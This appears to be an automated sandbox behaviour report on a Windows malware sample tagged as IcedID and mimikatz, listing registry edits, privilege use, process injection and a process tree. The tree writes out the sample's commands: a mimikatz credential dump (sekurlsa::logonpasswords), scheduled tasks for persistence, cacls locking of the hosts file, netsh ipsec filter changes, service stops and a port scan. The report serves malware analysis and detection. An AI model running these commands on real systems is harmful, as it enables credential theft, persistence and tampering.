\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tmyfwky.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language midctcinn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2920 cmd.exe 1576 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000b000000023b84-6.dat nsis_installer_2 behavioral2/files/0x000a000000023b8b-15.dat nsis_installer_1 behavioral2/files/0x000a000000023b8b-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" tmyfwky.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ tmyfwky.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" tmyfwky.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing tmyfwky.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" tmyfwky.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" tmyfwky.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ tmyfwky.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1576 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1772 schtasks.exe 396 schtasks.exe 1792 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2716 2025-01-02_8c0edf9595ce9a6d96f06997742ba294_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2716 2025-01-02_8c0edf9595ce9a6d96f06997742ba294_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2584 tmyfwky.exe Token: SeDebugPrivilege 5080 tmyfwky.exe Token: SeDebugPrivilege 4764 vfshost.exe Token: SeDebugPrivilege 4372 cmzbnyytn.exe Token: SeLockMemoryPrivilege 4392 lfbpkn.exe Token: SeLockMemoryPrivilege 4392 lfbpkn.exe Token: SeDebugPrivilege 2836 cmzbnyytn.exe Token: SeDebugPrivilege 4288 cmzbnyytn.exe Token: SeDebugPrivilege 3088 cmzbnyytn.exe Token: SeDebugPrivilege 3852 cmzbnyytn.exe Token: SeDebugPrivilege 512 cmzbnyytn.exe Token: SeDebugPrivilege 4792 cmzbnyytn.exe Token: SeDebugPrivilege 4708 cmzbnyytn.exe Token: SeDebugPrivilege 916 cmzbnyytn.exe Token: SeDebugPrivilege 4556 cmzbnyytn.exe Token: SeDebugPrivilege 524 cmzbnyytn.exe Token: SeDebugPrivilege 116 cmzbnyytn.exe Token: SeDebugPrivilege 4436 cmzbnyytn.exe Token: SeDebugPrivilege 3592 cmzbnyytn.exe Token: SeDebugPrivilege 4528 cmzbnyytn.exe Token: SeDebugPrivilege 1876 cmzbnyytn.exe Token: SeDebugPrivilege 2116 cmzbnyytn.exe Token: SeDebugPrivilege 1940 cmzbnyytn.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2716 2025-01-02_8c0edf9595ce9a6d96f06997742ba294_hacktools_icedid_mimikatz.exe 2716 2025-01-02_8c0edf9595ce9a6d96f06997742ba294_hacktools_icedid_mimikatz.exe 2584 tmyfwky.exe 2584 tmyfwky.exe 5080 tmyfwky.exe 5080 tmyfwky.exe 920 xohudmc.exe 3764 rwdxsq.exe 1944 tmyfwky.exe 1944 tmyfwky.exe 4028 tmyfwky.exe 4028 tmyfwky.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2716 wrote to memory of 2920 2716 2025-01-02_8c0edf9595ce9a6d96f06997742ba294_hacktools_icedid_mimikatz.exe 85 PID 2716 wrote to memory of 2920 2716 2025-01-02_8c0edf9595ce9a6d96f06997742ba294_hacktools_icedid_mimikatz.exe 85 PID 2716 wrote to memory of 2920 2716 2025-01-02_8c0edf9595ce9a6d96f06997742ba294_hacktools_icedid_mimikatz.exe 85 PID 2920 wrote to memory of 1576 2920 cmd.exe 87 PID 2920 wrote to memory of 1576 2920 cmd.exe 87 PID 2920 wrote to memory of 1576 2920 cmd.exe 87 PID 2920 wrote to memory of 2584 2920 cmd.exe 89 PID 2920 wrote to memory of 2584 2920 cmd.exe 89 PID 2920 wrote to memory of 2584 2920 cmd.exe 89 PID 5080 wrote to memory of 3096 5080 tmyfwky.exe 91 PID 5080 wrote to memory of 3096 5080 tmyfwky.exe 91 PID 5080 wrote to memory of 3096 5080 tmyfwky.exe 91 PID 3096 wrote to memory of 4024 3096 cmd.exe 93 PID 3096 wrote to memory of 4024 3096 cmd.exe 93 PID 3096 wrote to memory of 4024 3096 cmd.exe 93 PID 3096 wrote to memory of 4528 3096 cmd.exe 94 PID 3096 wrote to memory of 4528 3096 cmd.exe 94 PID 3096 wrote to memory of 4528 3096 cmd.exe 94 PID 3096 wrote to memory of 3248 3096 cmd.exe 95 PID 3096 wrote to memory of 3248 3096 cmd.exe 95 PID 3096 wrote to memory of 3248 3096 cmd.exe 95 PID 3096 wrote to memory of 4888 3096 cmd.exe 96 PID 3096 wrote to memory of 4888 3096 cmd.exe 96 PID 3096 wrote to memory of 4888 3096 cmd.exe 96 PID 3096 wrote to memory of 756 3096 cmd.exe 97 PID 3096 wrote to memory of 756 3096 cmd.exe 97 PID 3096 wrote to memory of 756 3096 cmd.exe 97 PID 3096 wrote to memory of 4200 3096 cmd.exe 98 PID 3096 wrote to memory of 4200 3096 cmd.exe 98 PID 3096 wrote to memory of 4200 3096 cmd.exe 98 PID 5080 wrote to memory of 3932 5080 tmyfwky.exe 100 PID 5080 wrote to memory of 3932 5080 tmyfwky.exe 100 PID 5080 wrote to memory of 3932 5080 tmyfwky.exe 100 PID 5080 wrote to memory of 1172 5080 tmyfwky.exe 102 PID 5080 wrote to memory of 1172 5080 tmyfwky.exe 102 PID 5080 wrote to memory of 1172 5080 tmyfwky.exe 102 PID 5080 wrote to memory of 2832 5080 tmyfwky.exe 104 PID 5080 wrote to memory of 2832 5080 tmyfwky.exe 104 PID 5080 wrote to memory of 2832 5080 tmyfwky.exe 104 PID 5080 wrote to memory of 4012 5080 tmyfwky.exe 115 PID 5080 wrote to memory of 4012 5080 tmyfwky.exe 115 PID 5080 wrote to memory of 4012 5080 tmyfwky.exe 115 PID 4012 wrote to memory of 3868 4012 cmd.exe 117 PID 4012 wrote to memory of 3868 4012 cmd.exe 117 PID 4012 wrote to memory of 3868 4012 cmd.exe 117 PID 3868 wrote to memory of 2704 3868 wpcap.exe 118 PID 3868 wrote to memory of 2704 3868 wpcap.exe 118 PID 3868 wrote to memory of 2704 3868 wpcap.exe 118 PID 2704 wrote to memory of 4668 2704 net.exe 120 PID 2704 wrote to memory of 4668 2704 net.exe 120 PID 2704 wrote to memory of 4668 2704 net.exe 120 PID 3868 wrote to memory of 3484 3868 wpcap.exe 121 PID 3868 wrote to memory of 3484 3868 wpcap.exe 121 PID 3868 wrote to memory of 3484 3868 wpcap.exe 121 PID 3484 wrote to memory of 4664 3484 net.exe 123 PID 3484 wrote to memory of 4664 3484 net.exe 123 PID 3484 wrote to memory of 4664 3484 net.exe 123 PID 3868 wrote to memory of 2256 3868 wpcap.exe 124 PID 3868 wrote to memory of 2256 3868 wpcap.exe 124 PID 3868 wrote to memory of 2256 3868 wpcap.exe 124 PID 2256 wrote to memory of 772 2256 net.exe 126 PID 2256 wrote to memory of 772 2256 net.exe 126 PID 2256 wrote to memory of 772 2256 net.exe 126 PID 3868 wrote to memory of 920 3868 wpcap.exe 127
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2140
-
C:\Windows\TEMP\dvfzrticv\lfbpkn.exe"C:\Windows\TEMP\dvfzrticv\lfbpkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-02_8c0edf9595ce9a6d96f06997742ba294_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-02_8c0edf9595ce9a6d96f06997742ba294_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\cbdnbivt\tmyfwky.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1576
-
-
C:\Windows\cbdnbivt\tmyfwky.exeC:\Windows\cbdnbivt\tmyfwky.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2584
-
-
-
C:\Windows\cbdnbivt\tmyfwky.exeC:\Windows\cbdnbivt\tmyfwky.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4024
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:4528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3248
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:4888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:756
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:4200
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3932
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1172
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2832
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\itcctjlje\unptrtjvi\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\Windows\itcctjlje\unptrtjvi\wpcap.exeC:\Windows\itcctjlje\unptrtjvi\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4668
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4664
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:772
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:920
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:2848
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1184 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:3952 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:940
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3088
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:5040 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1400
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\itcctjlje\unptrtjvi\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:5032 -
C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exeC:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\itcctjlje\unptrtjvi\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\itcctjlje\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\itcctjlje\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4692 -
C:\Windows\itcctjlje\Corporate\vfshost.exeC:\Windows\itcctjlje\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "abdndmbcd" /ru system /tr "cmd /c C:\Windows\ime\tmyfwky.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4360 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3988
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "abdndmbcd" /ru system /tr "cmd /c C:\Windows\ime\tmyfwky.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1792
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "biicucyni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F"2⤵PID:1624
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "biicucyni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tknlleieq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:4428 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tknlleieq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:396
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1568
-
-
